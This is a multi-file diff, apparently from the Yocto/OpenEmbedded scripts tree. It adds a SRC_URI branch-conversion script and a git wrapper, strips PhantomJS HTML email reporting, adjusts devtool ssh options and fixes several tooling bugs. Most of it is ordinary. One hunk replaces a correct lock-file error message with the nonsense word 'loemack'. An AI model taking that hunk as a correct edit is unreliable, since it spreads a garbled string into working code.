diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Virtual terminal emulator GTK+ widget library"
+DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
 BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
 LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
 LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
     # Edit the recipes
     $ bitbake-whatchanged core-image-sato
 
-The changes will be printed"
+The changes will be printed.
 
 Note:
     The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
 import sys
 import os
 import argparse
-from distutils.version import LooseVersion
 
 # Ensure PythonGit is installed (buildhistory_analysis needs it)
 try:
@@ -71,10 +70,6 @@ def main():
     parser = get_args_parser()
     args = parser.parse_args()
 
-    if LooseVersion(git.__version__) < '0.3.1':
-        sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
-        sys.exit(1)
-
     if len(args.revisions) > 2:
         sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
         parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
     exit 1
 fi
 
-if [ -n "$email_to" ]; then
-    if ! [ -x "$(command -v phantomjs)" ]; then
-        echo "ERROR: Sending email needs phantomjs."
-        exit 1
-    fi
-    if ! [ -x "$(command -v optipng)" ]; then
-        echo "ERROR: Sending email needs optipng."
-        exit 1
-    fi
-fi
-
 # Open a file descriptor for flock and acquire lock
 LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
 if ! exec 3> "$LOCK_FILE"; then
-    echo "ERROR: Unable to open lock file"
+    echo "ERROR: Unable to open loemack file"
     exit 1
 fi
 if ! flock -n 3; then
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
     if [ -n "$email_to" ]; then
         echo "Emailing test report"
         os_name=`get_os_release_var PRETTY_NAME`
-        "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
+        "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
     fi
 
     # Upload report files, unless we're on detached head
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+#
+# Conversion script to update SRC_URI to add branch to git urls
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import re
+import os
+import sys
+import tempfile
+import shutil
+import mimetypes
+
+if len(sys.argv) < 2:
+    print("Please specify a directory to run the conversion script against.")
+    sys.exit(1)
+
+def processfile(fn):
+    def matchline(line):
+        if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
+            return False
+        return True
+    print("processing file '%s'" % fn)
+    try:
+        if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
+            return
+        fh, abs_path = tempfile.mkstemp()
+        modified = False
+        with os.fdopen(fh, 'w') as new_file:
+            with open(fn, "r") as old_file:
+                for line in old_file:
+                    if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
+                        if line.endswith('"\n'):
+                            line = line.replace('"\n', ';branch=master"\n')
+                        elif line.endswith(" \\\n"):
+                            line = line.replace(' \\\n', ';branch=master \\\n')
+                        modified = True
+                    if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
+                        if "protocol=git" in line:
+                            line = line.replace('protocol=git', 'protocol=https')
+                        elif line.endswith('"\n'):
+                            line = line.replace('"\n', ';protocol=https"\n')
+                        elif line.endswith(" \\\n"):
+                            line = line.replace(' \\\n', ';protocol=https \\\n')
+                        modified = True
+                    new_file.write(line)
+        if modified:
+            shutil.copymode(fn, abs_path)
+            os.remove(fn)
+            shutil.move(abs_path, fn)
+    except UnicodeDecodeError:
+        pass
+
+ourname = os.path.basename(sys.argv[0])
+ourversion = "0.1"
+
+if os.path.isfile(sys.argv[1]):
+    processfile(sys.argv[1])
+    sys.exit(0)
+
+for targetdir in sys.argv[1:]:
+    print("processing directory '%s'" % targetdir)
+    for root, dirs, files in os.walk(targetdir):
+        for name in files:
+            if name == ourname:
+                continue
+            fn = os.path.join(root, name)
+            if os.path.islink(fn):
+                continue
+            if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
+                continue
+            processfile(fn)
+
+print("All files processed with version %s" % ourversion)
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
 
 echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
 echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
-echo " you'll get false positives.  For example, LICENSE_FLAGS_WHITELIST = \"Commercial\""
+echo " you'll get false positives.  For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
 
 for pkg in `bitbake -s | awk '{ print \$1 }'`; do
 	if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
 import subprocess
 import sys
 import tempfile
-from email.mime.image import MIMEImage
-from email.mime.multipart import MIMEMultipart
 from email.mime.text import MIMEText
 
 
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
 log = logging.getLogger('oe-build-perf-report')
 
 
-# Find js scaper script
-SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
-                         'scrape-html-report.js')
-if not os.path.isfile(SCRAPE_JS):
-    log.error("Unableto find oe-build-perf-report-scrape.js")
-    sys.exit(1)
-
-
-class ReportError(Exception):
-    """Local errors"""
-    pass
-
-
-def check_utils():
-    """Check that all needed utils are installed in the system"""
-    missing = []
-    for cmd in ('phantomjs', 'optipng'):
-        if not shutil.which(cmd):
-            missing.append(cmd)
-    if missing:
-        log.error("The following tools are missing: %s", ' '.join(missing))
-        sys.exit(1)
-
-
 def parse_args(argv):
     """Parse command line arguments"""
     description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
                              "the email parts")
     parser.add_argument('--text',
                         help="Plain text message")
-    parser.add_argument('--html',
-                        help="HTML peport generated by oe-build-perf-report")
-    parser.add_argument('--phantomjs-args', action='append',
-                        help="Extra command line arguments passed to PhantomJS")
 
     args = parser.parse_args(argv)
 
-    if not args.html and not args.text:
-        parser.error("Please specify --html and/or --text")
+    if not args.text:
+        parser.error("Please specify --text")
 
     return args
 
 
-def decode_png(infile, outfile):
-    """Parse/decode/optimize png data from a html element"""
-    with open(infile) as f:
-        raw_data = f.read()
-
-    # Grab raw base64 data
-    b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
-    b64_data = re.sub('">.+$', '', b64_data, 1)
-
-    # Replace file with proper decoded png
-    with open(outfile, 'wb') as f:
-        f.write(base64.b64decode(b64_data))
-
-    subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
-
-
-def mangle_html_report(infile, outfile, pngs):
-    """Mangle html file into a email compatible format"""
-    paste = True
-    png_dir = os.path.dirname(outfile)
-    with open(infile) as f_in:
-        with open(outfile, 'w') as f_out:
-            for line in f_in.readlines():
-                stripped = line.strip()
-                # Strip out scripts
-                if stripped == '<!--START-OF-SCRIPTS-->':
-                    paste = False
-                elif stripped == '<!--END-OF-SCRIPTS-->':
-                    paste = True
-                elif paste:
-                    if re.match('^.+href="data:image/png;base64', stripped):
-                        # Strip out encoded pngs (as they're huge in size)
-                        continue
-                    elif 'www.gstatic.com' in stripped:
-                        # HACK: drop references to external static pages
-                        continue
-
-                    # Replace charts with <img> elements
-                    match = re.match('<div id="(?P<id>\w+)"', stripped)
-                    if match and match.group('id') in pngs:
-                        f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
-                    else:
-                        f_out.write(line)
-
-
-def scrape_html_report(report, outdir, phantomjs_extra_args=None):
-    """Scrape html report into a format sendable by email"""
-    tmpdir = tempfile.mkdtemp(dir='.')
-    log.debug("Using tmpdir %s for phantomjs output", tmpdir)
-
-    if not os.path.isdir(outdir):
-        os.mkdir(outdir)
-    if os.path.splitext(report)[1] not in ('.html', '.htm'):
-        raise ReportError("Invalid file extension for report, needs to be "
-                          "'.html' or '.htm'")
-
-    try:
-        log.info("Scraping HTML report with PhangomJS")
-        extra_args = phantomjs_extra_args if phantomjs_extra_args else []
-        subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
-                                [SCRAPE_JS, report, tmpdir],
-                                stderr=subprocess.STDOUT)
-
-        pngs = []
-        images = []
-        for fname in os.listdir(tmpdir):
-            base, ext = os.path.splitext(fname)
-            if ext == '.png':
-                log.debug("Decoding %s", fname)
-                decode_png(os.path.join(tmpdir, fname),
-                           os.path.join(outdir, fname))
-                pngs.append(base)
-                images.append(fname)
-            elif ext in ('.html', '.htm'):
-                report_file = fname
-            else:
-                log.warning("Unknown file extension: '%s'", ext)
-                #shutil.move(os.path.join(tmpdir, fname), outdir)
-
-        log.debug("Mangling html report file %s", report_file)
-        mangle_html_report(os.path.join(tmpdir, report_file),
-                           os.path.join(outdir, report_file), pngs)
-        return (os.path.join(outdir, report_file),
-                [os.path.join(outdir, i) for i in images])
-    finally:
-        shutil.rmtree(tmpdir)
-
-def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
-               blind_copy=[]):
-    """Send email"""
+def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
     # Generate email message
-    text_msg = html_msg = None
-    if text_fn:
-        with open(text_fn) as f:
-            text_msg = MIMEText("Yocto build performance test report.\n" +
-                                f.read(), 'plain')
-    if html_fn:
-        html_msg = msg = MIMEMultipart('related')
-        with open(html_fn) as f:
-            html_msg.attach(MIMEText(f.read(), 'html'))
-        for img_fn in image_fns:
-            # Expect that content id is same as the filename
-            cid = os.path.splitext(os.path.basename(img_fn))[0]
-            with open(img_fn, 'rb') as f:
-                image_msg = MIMEImage(f.read())
-            image_msg['Content-ID'] = '<{}>'.format(cid)
-            html_msg.attach(image_msg)
-
-    if text_msg and html_msg:
-        msg = MIMEMultipart('alternative')
-        msg.attach(text_msg)
-        msg.attach(html_msg)
-    elif text_msg:
-        msg = text_msg
-    elif html_msg:
-        msg = html_msg
-    else:
-        raise ReportError("Neither plain text nor html body specified")
+    with open(text_fn) as f:
+        msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
 
     pw_data = pwd.getpwuid(os.getuid())
     full_name = pw_data.pw_gecos.split(',')[0]
@@ -234,8 +90,6 @@ def main(argv=None):
     if args.debug:
         log.setLevel(logging.DEBUG)
 
-    check_utils()
-
     if args.outdir:
         outdir = args.outdir
         if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
 
     try:
         log.debug("Storing email parts in %s", outdir)
-        html_report = images = None
-        if args.html:
-            html_report, images = scrape_html_report(args.html, outdir,
-                                                     args.phantomjs_args)
-
         if args.to:
             log.info("Sending email to %s", ', '.join(args.to))
             if args.cc:
                 log.info("Copying to %s", ', '.join(args.cc))
             if args.bcc:
                 log.info("Blind copying to %s", ', '.join(args.bcc))
-            send_email(args.text, html_report, images, args.subject,
-                       args.to, args.cc, args.bcc)
+            send_email(args.text, args.subject, args.to, args.cc, args.bcc)
     except subprocess.CalledProcessError as err:
         log.error("%s, with output:\n%s", str(err), err.output.decode())
         return 1
-    except ReportError as err:
-        log.error(err)
-        return 1
     finally:
         if not args.outdir:
             log.debug("Wiping %s", outdir)
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
 GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
 REMOTE_URL=${REMOTE_URL%.git}
 REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
-REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#")
+REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
 
 if [ -z "$BRANCH" ]; then
 	BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'git' that doesn't think we are root
+
+import os
+import shutil
+import sys
+
+os.environ['PSEUDO_UNLOAD'] = '1'
+
+# calculate path to the real 'git'
+path = os.environ['PATH']
+# we need to remove our path but also any other copy of this script which
+# may be present, e.g. eSDK.
+replacements = [os.path.dirname(sys.argv[0])]
+for p in path.split(":"):
+    if p.endswith("/scripts"):
+        replacements.append(p)
+for r in replacements:
+    path = path.replace(r, '/ignoreme')
+real_git = shutil.which('git', path=path)
+
+if len(sys.argv) == 1:
+    os.execl(real_git, 'git')
+
+os.execv(real_git, sys.argv)
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
 import logging
 import os
 import re
-from collections import namedtuple,OrderedDict
+from collections import namedtuple
 from statistics import mean
 
 
@@ -238,7 +238,7 @@ class BuildStats(dict):
         subdirs = os.listdir(path)
         for dirname in subdirs:
             recipe_dir = os.path.join(path, dirname)
-            if not os.path.isdir(recipe_dir):
+            if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
                 continue
             name, epoch, version, revision = cls.split_nevr(dirname)
             bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
 
     return layers
 
-def _find_layer_depends(depend, layers):
+def _find_layer(depend, layers):
     for layer in layers:
         if 'collections' not in layer:
             continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
                 return layer
     return None
 
-def add_layer_dependencies(bblayersconf, layer, layers, logger):
+def get_layer_dependencies(layer, layers, logger):
     def recurse_dependencies(depends, layer, layers, logger, ret = []):
         logger.debug('Processing dependencies %s for layer %s.' % \
                     (depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
             if depend == 'core':
                 continue
 
-            layer_depend = _find_layer_depends(depend, layers)
+            layer_depend = _find_layer(depend, layers)
             if not layer_depend:
                 logger.error('Layer %s depends on %s and isn\'t found.' % \
                         (layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
         layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
 
     # Note: [] (empty) is allowed, None is not!
+    return layer_depends
+
+def add_layer_dependencies(bblayersconf, layer, layers, logger):
+
+    layer_depends = get_layer_dependencies(layer, layers, logger)
     if layer_depends is None:
         return False
     else:
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
         # The top-level README file may have a suffix (like README.rst or README.txt).
         readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
         self.assertTrue(len(readme_files) > 0,
-                        msg="Layer doesn't contains README file.")
+                        msg="Layer doesn't contain a README file.")
 
         # There might be more than one file matching the file pattern above
         # (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
         if args.strip and not args.dry_run:
             # Fakeroot copy to new destination
             srcdir = recipe_outdir
-            recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped')
+            recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
             if os.path.isdir(recipe_outdir):
-                bb.utils.remove(recipe_outdir, True)
+                exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
             exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
             os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
             oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
                 print('  %s' % item)
             return 0
 
-        extraoptions = ''
+        extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
         if args.no_host_check:
-            extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+            extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
         if not args.show_status:
             extraoptions += ' -q'
 
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
     elif not args.recipename and not args.all:
         raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
 
-    extraoptions = ''
+    extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
     if args.no_host_check:
-        extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+        extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
     if not args.show_status:
         extraoptions += ' -q'
 
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
             return 1
 
         check_workspace_recipe(workspace, args.component)
-        pn = rd.getVar('PN', True)
+        pn = rd.getVar('PN')
 
         if not rd.getVarFlag('do_menuconfig','task'):
             raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index d140b97de1..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
             bb.utils.mkdirhier(dst_d)
         shutil.move(src, dst)
 
-def _copy_file(src, dst, dry_run_outdir=None):
+def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
     """Copy a file. Creates all the directory components of destination path."""
     dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
     logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -474,7 +474,11 @@ def symlink_oelocal_files_srctree(rd,srctree):
                 destpth = os.path.join(srctree, relpth, fn)
                 if os.path.exists(destpth):
                     os.unlink(destpth)
-                os.symlink('oe-local-files/%s' % fn, destpth)
+                if relpth != '.':
+                    back_relpth = os.path.relpath(local_files_dir, root)
+                    os.symlink('%s/oe-local-files/%s/%s' % (back_relpth, relpth, fn), destpth)
+                else:
+                    os.symlink('oe-local-files/%s' % fn, destpth)
                 addfiles.append(os.path.join(relpth, fn))
         if addfiles:
             bb.process.run('git add %s' % ' '.join(addfiles), cwd=srctree)
@@ -531,7 +535,6 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
 
     initial_rev = None
 
-    appendexisted = False
     recipefile = d.getVar('FILE')
     appendfile = recipe_to_append(recipefile, config)
     is_kernel_yocto = bb.data.inherits_class('kernel-yocto', d)
@@ -590,6 +593,16 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
             else:
                 task = 'do_patch'
 
+                if 'noexec' in (d.getVarFlags(task, False) or []) or 'task' not in (d.getVarFlags(task, False) or []):
+                    logger.info('The %s recipe has %s disabled. Running only '
+                                       'do_configure task dependencies' % (pn, task))
+
+                    if 'depends' in d.getVarFlags('do_configure', False):
+                        pn = d.getVarFlags('do_configure', False)['depends']
+                        pn = pn.replace('${PV}', d.getVar('PV'))
+                        pn = pn.replace('${COMPILERDEP}', d.getVar('COMPILERDEP'))
+                        task = None
+
             # Run the fetch + unpack tasks
             res = tinfoil.build_targets(pn,
                                         task,
@@ -601,6 +614,17 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
         if not res:
             raise DevtoolError('Extracting source for %s failed' % pn)
 
+        if not is_kernel_yocto and ('noexec' in (d.getVarFlags('do_patch', False) or []) or 'task' not in (d.getVarFlags('do_patch', False) or [])):
+            workshareddir = d.getVar('S')
+            if os.path.islink(srctree):
+                os.unlink(srctree)
+
+            os.symlink(workshareddir, srctree)
+
+            # The initial_rev file is created in devtool_post_unpack function that will not be executed if
+            # do_unpack/do_patch tasks are disabled so we have to directly say that source extraction was successful
+            return True, True
+
         try:
             with open(os.path.join(tempdir, 'initial_rev'), 'r') as f:
                 initial_rev = f.read()
@@ -848,10 +872,11 @@ def modify(args, config, basepath, workspace):
             if not initial_rev:
                 return 1
             logger.info('Source tree extracted to %s' % srctree)
-            # Get list of commits since this revision
-            (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
-            commits = stdout.split()
-            check_commits = True
+            if os.path.exists(os.path.join(srctree, '.git')):
+                # Get list of commits since this revision
+                (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
+                commits = stdout.split()
+                check_commits = True
         else:
             if os.path.exists(os.path.join(srctree, '.git')):
                 # Check if it's a tree previously extracted by us. This is done
@@ -928,12 +953,17 @@ def modify(args, config, basepath, workspace):
 
             if bb.data.inherits_class('kernel', rd):
                 f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
-                        'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n')
+                        'do_fetch do_unpack do_kernel_configcheck"\n')
                 f.write('\ndo_patch[noexec] = "1"\n')
                 f.write('\ndo_configure_append() {\n'
                         '    cp ${B}/.config ${S}/.config.baseline\n'
                         '    ln -sfT ${B}/.config ${S}/.config.new\n'
                         '}\n')
+                f.write('\ndo_kernel_configme_prepend() {\n'
+                        '    if [ -e ${S}/.config ]; then\n'
+                        '        mv ${S}/.config ${S}/.config.old\n'
+                        '    fi\n'
+                        '}\n')
             if rd.getVarFlag('do_menuconfig','task'):
                 f.write('\ndo_configure_append() {\n'
                 '    if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
         if args.binary:
             # Assume the archive contains the directory structure verbatim
             # so we need to extract to a subdirectory
-            fetchuri += ';subdir=${BP}'
+            fetchuri += ';subdir=${BPN}'
         srcuri = fetchuri
         rev_re = re.compile(';rev=([^;]+)')
         res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
             storeTagName = params['tag']
             params['nobranch'] = '1'
             del params['tag']
+        # Assume 'master' branch if not set
+        if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
+            params['branch'] = 'master'
         fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
 
         tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
             # Remove HEAD reference point and drop remote prefix
             get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
             if 'master' in get_branch:
-                # If it is master, we do not need to append 'branch=master' as this is default.
                 # Even with the case where get_branch has multiple objects, if 'master' is one
                 # of them, we should default take from 'master'
-                srcbranch = ''
+                srcbranch = 'master'
             elif len(get_branch) == 1:
                 # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
                 srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
         # Since we might have a value in srcbranch, we need to
         # recontruct the srcuri to include 'branch' in params.
         scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
-        if srcbranch:
-            params['branch'] = srcbranch
+        if scheme in ['git', 'gitsm']:
+            params['branch'] = srcbranch or 'master'
 
         if storeTagName and scheme in ['git', 'gitsm']:
             # Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
                     splitline = line.split()
                     if len(splitline) > 1:
                         if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
-                            srcuri = reformat_git_uri(splitline[1])
+                            srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
                             srcsubdir = 'git'
                             break
 
@@ -743,6 +745,10 @@ def create_recipe(args):
     for handler in handlers:
         handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
 
+    # native and nativesdk classes are special and must be inherited last
+    # If present, put them at the end of the classes list
+    classes.sort(key=lambda c: c in ("native", "nativesdk"))
+
     extrafiles = extravalues.pop('extrafiles', {})
     extra_pn = extravalues.pop('PN', None)
     extra_pv = extravalues.pop('PV', None)
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
             vals['sort'] = line['testseries'] + "_" + line['result_id']
             vals['failed_testcases'] = line['failed_testcases']
             for k in cols:
-                vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+                if total_tested:
+                    vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+                else:
+                    vals[k] = "0 (0%)"
             for k in maxlen:
                 if k in vals and len(vals[k]) > maxlen[k]:
                     maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
             testseries = posixpath.basename(posixpath.dirname(url.path))
         else:
             with open(f, "r") as filedata:
-                data = json.load(filedata)
+                try:
+                    data = json.load(filedata)
+                except json.decoder.JSONDecodeError:
+                    print("Cannot decode {}. Possible corruption. Skipping.".format(f))
+                    data = ""
             testseries = os.path.basename(os.path.dirname(f))
     else:
         data = f
@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
     return decode_log(ptest['log'])
 
 def ptestresult_get_log(results, section):
-    return generic_get_log('ptestresuls.sections', results, section)
+    return generic_get_log('ptestresult.sections', results, section)
 
 def generic_get_rawlogs(sectname, results):
     if sectname not in results:
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
 import tempfile
 import threading
 import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
 
 class KeepAliveStreamHandler(logging.StreamHandler):
     def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
         logger.debug('Loading plugin %s' % name)
         spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
         if spec:
-            return spec.loader.load_module()
+            mod = importlib.util.module_from_spec(spec)
+            spec.loader.exec_module(mod)
+            return mod
 
     def plugin_name(filename):
         return os.path.splitext(os.path.basename(filename))[0]
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
